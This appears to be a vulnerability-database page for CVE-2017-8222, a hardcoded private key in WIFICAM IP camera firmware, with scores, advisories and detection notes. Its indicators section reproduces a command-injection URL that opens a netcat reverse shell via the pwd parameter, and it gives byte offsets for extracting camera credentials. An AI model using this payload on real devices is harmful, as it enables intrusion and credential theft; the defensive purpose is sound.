CVE-2017-8222
published 2017-04-25CVE-2017-8222: Wireless IP Camera (P2P) WIFICAM devices have an "Apple Production IOS Push Services" private RSA key and certificate stored in /system/www/pem/ck.pem inside…
PriorityP275high7.5CVSS 3.0
AVNACLPRNUINSUCHINAN
ITWEXPLOITVulnCheck KEV
Exploited in the wild
EPSS
4.22%
89.8th percentile
Wireless IP Camera (P2P) WIFICAM devices have an "Apple Production IOS Push Services" private RSA key and certificate stored in /system/www/pem/ck.pem inside the firmware, which allows attackers to obtain sensitive information.
Detection & IOCsextracted from sources · hover to see the quote
url/set_ftp.cgi?next_url=ftp.htm&loginuse=%s&loginpas=%s&svr=192.168.1.1&port=21&user=ftp&pwd=$(nc%20192.168.1.1+1337%20-e/bin/sh)&dir=/&mode=PORT&upload_interval=0↗
- →Monitor HTTP GET requests to /set_ftp.cgi and /ftptest.cgi on port 80 of camera devices; command injection is delivered via the `pwd` parameter using shell subshell syntax $(...). ↗
- →Credential extraction from device config response relies on a binary marker sequence 0x0a 0x0a 0x0a 0x0a 0x01; credentials (login at offset +138, password at offset +170) can be parsed from the raw binary config dump. ↗
- →Presence of /system/www/pem/ck.pem in firmware images indicates the hardcoded 'Apple Production IOS Push Services' private RSA key/certificate; scan firmware blobs for this path during threat hunting. ↗
- →Alternative payloads use wget to fetch and execute a remote binary; detect outbound HTTP from camera devices to unexpected hosts following a /set_ftp.cgi request. ↗
- ·The exploit targets the default credential 'admin'/'admin'; the login can be changed by the user, but the binary config parsing logic assumes 'admin' as the default login to locate the password at a fixed offset. ↗
- ·An alternative binary marker (0x0006 0x0606 0x0606 0x0100 0x000a) may also be present in config responses; detection logic should account for both patterns. ↗
CVSS provenance
nvdv3.07.5HIGHCVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
nvdv2.05.0MEDIUMAV:N/AC:L/Au:N/C:P/I:N/A:N
vulncheck7.5HIGH
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
GHSA
GHSA-mjff-gwfw-rfgm: Wireless IP Camera (P2P) WIFICAM devices have an "Apple Production IOS Push Services" private RSA key and certificate stored in /system/www/pem/ck
ghsa_unreviewed·2022-05-13
CVE-2017-8222 [HIGH] CWE-522 GHSA-mjff-gwfw-rfgm: Wireless IP Camera (P2P) WIFICAM devices have an "Apple Production IOS Push Services" private RSA key and certificate stored in /system/www/pem/ck
Wireless IP Camera (P2P) WIFICAM devices have an "Apple Production IOS Push Services" private RSA key and certificate stored in /system/www/pem/ck.pem inside the firmware, which allows attackers to obtain sensitive information.
VulnCheck
wificam wireless_ip_camera_\(p2p\)_firmware Insufficiently Protected Credentials
vulncheck·2017·CVSS 7.5
CVE-2017-8222 [HIGH] wificam wireless_ip_camera_\(p2p\)_firmware Insufficiently Protected Credentials
wificam wireless_ip_camera_\(p2p\)_firmware Insufficiently Protected Credentials
Wireless IP Camera (P2P) WIFICAM devices have an "Apple Production IOS Push Services" private RSA key and certificate stored in /system/www/pem/ck.pem inside the firmware, which allows attackers to obtain sensitive information.
Affected: wificam wireless_ip_camera_\(p2p\)_firmware
Required Action: Apply remediations or mitigations per vendor instructions or discontinue use of the product if remediation or mitigations are unavailable.
Exploitation References: https://www.researchgate.net/publication/348602660_An_analysis_of_the_use_of_CVEs_by_IoT_malware
No detection rules found.
No writeups or analysis indexed.
2017-04-25
Published
Exploited in the wild